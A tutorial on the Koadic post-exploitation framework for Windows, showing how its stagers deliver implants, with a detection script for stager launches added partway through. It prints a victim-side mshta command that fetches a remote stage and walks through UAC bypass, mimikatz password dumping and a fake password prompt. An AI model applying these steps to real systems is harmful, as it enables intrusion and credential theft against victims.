Koadic - like Empire, only without powershell

  • Tutorial


In this post we look at the Koadic framework, a post-exploitation tool for every generation of the Windows family: it does not need PowerShell on the target system in order to work.

Installation and architecture


Clone the official repository from GitHub.

git clone https://github.com/zerosum0x0/koadic.git

After installation, run koadic and you land in the menu.

In structure and principle of operation, Koadic is very similar to PowerShell Empire.

First, the victim has to perform some action so that we get a session.
Next, a module is used to bypass User Account Control (UAC), and after that the other modules are launched.

Accordingly, Koadic modules fall into stagers and implants. In the screenshot above you can see that my version has 4 stagers (the means of delivering implants) and 29 implants, the modules that "do something useful".

At startup the default stager, stager/js/mshta, is selected. This module writes nothing to disk; it uses .hta scripts and, accordingly, the mshta.exe process to launch implants.

There are other stagers, for example stager/js/rundll32_js, which, as the name suggests, uses rundll32.exe instead of mshta.exe.

As for implants, the selection is fairly large.

In addition to the UAC bypass modules, there are modules that read the clipboard contents, dump the SAM and NTDS, run mimikatz, execute commands in CMD (of course), scan hosts on the network for open ports, and more.

A complete list of stagers and implants can be found on the official website.
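Because the mshta stager writes nothing to disk, the stager delivery described above is most visible in process-creation telemetry: one of the Windows script hosts the stagers rely on (mshta.exe, rundll32.exe, regsvr32.exe) starts with a URL on its command line. The following detector is an added example, not code from the post or from the Koadic project. It assumes a simplified key=value log format for process-creation events, constructed sample lines (only the mshta line reuses the command shown later in the post; the rundll32 and regsvr32 command lines are placeholders, not the stagers' real invocations), and that the regsvr stager runs through regsvr32.exe.

```python
"""Added example: flag Koadic-style stager launches in process-creation logs.

Not part of the original post or of Koadic. The log format, the sample lines
and the helper names are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Script hosts used by Koadic's JavaScript stagers: mshta.exe (stager/js/mshta),
# rundll32.exe (stager/js/rundll32_js) and, by assumption, regsvr32.exe for the
# regsvr stager. Any of these fetching a URL is worth an alert.
STAGER_HOSTS = {"mshta.exe", "rundll32.exe", "regsvr32.exe"}

# A remote stage is identified by an http(s) URL anywhere in the command line.
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# key=value pairs; a value is either a double-quoted string (with \" escapes)
# or a run of non-whitespace characters.
FIELD_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Constructed sample log (simplified Sysmon-event-1-like fields). Lines 1, 4 and 5
# should be flagged; the others are ordinary, non-suspicious process starts.
SAMPLE_LOG_LINES = [
    r'Image=C:\Windows\System32\mshta.exe CommandLine="mshta http://192.168.1.3:1234/BFIER" ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\mshta.exe CommandLine="mshta.exe C:\Users\alice\app\index.hta" ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe shell32.dll,Control_RunDLL" ParentImage=C:\Windows\explorer.exe',
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe http://10.0.0.5:9000/stage" ParentImage=C:\Windows\System32\cmd.exe',
    r'Image=C:\Windows\System32\regsvr32.exe CommandLine="regsvr32.exe /s /i:http://10.0.0.5:9000/stage" ParentImage=C:\Windows\System32\cmd.exe',
    r'Image="C:\Program Files\Browser\browser.exe" CommandLine="browser.exe http://intranet.example/page" ParentImage=C:\Windows\explorer.exe',
]


@dataclass
class Finding:
    """One suspicious process start: which host binary, which URL, who spawned it."""
    image: str
    url: str
    parent: str


def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value log line into a dict, unquoting quoted values."""
    fields: Dict[str, str] = {}
    for key, value in FIELD_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1].replace('\\"', '"')
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def scan(lines: List[str]) -> List[Finding]:
    """Return a Finding for every stager host binary launched with a URL argument."""
    findings: List[Finding] = []
    for line in lines:
        if not line.strip():
            continue
        fields = parse_line(line)
        exe = basename(fields.get("Image", ""))
        if exe not in STAGER_HOSTS:
            continue  # browsers and other programs legitimately take URLs
        match = URL_RE.search(fields.get("CommandLine", ""))
        if match:
            findings.append(Finding(exe, match.group(0), fields.get("ParentImage", "")))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(f"ALERT {finding.image} fetched {finding.url} (parent: {finding.parent})")
```

The rule deliberately ignores mshta.exe started with a local .hta file and ignores browsers given a URL; the combination of a script host and a remote stage is what distinguishes the stager delivery from everyday use of those binaries.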

Usage examples


After starting, you can run the help command and get a list like this.

To see the parameters of the current module, run the info command.

If something does not suit us, a parameter can be changed with the set command.

Then run the stager.



Next, the victim must execute the command

mshta http://192.168.1.3:1234/BFIER


For demonstration, I chose the old Windows 2000 (IP 192.168.1.7).
After running the command, I get a session in Koadic.



When executing the same command on a Russian-localized Windows 7 (IP 192.168.2.2), I received an ASCII conversion error, probably due to Russian characters.



The zombies command lists the hosts available for post-exploitation.



To get more detailed information, add the ID to the command.



Since this is Windows 2000, we do not need the UAC bypass modules, so we simply try to execute an operating system command through our Koadic session.

The command worked correctly.

Let's try another stager, for example stager/js/regsvr, on an English-language Windows 7.



After executing the specified command, we get a session in Koadic, and then we can use the module that bypasses UAC.



Then you can use, for example, mimikatz.



And we got user passwords.

There are more "creative" implants, for example implant/phish/password_box, which shows the user a window with arbitrary text and asks for a password.



And we get a message in Koadic.



Of course, not all of the framework's modules work flawlessly, but it can nevertheless serve as an alternative to Empire when the situation requires it, with the non-working modules replaced by a series of operating system commands available to us through the Koadic modules that do work.
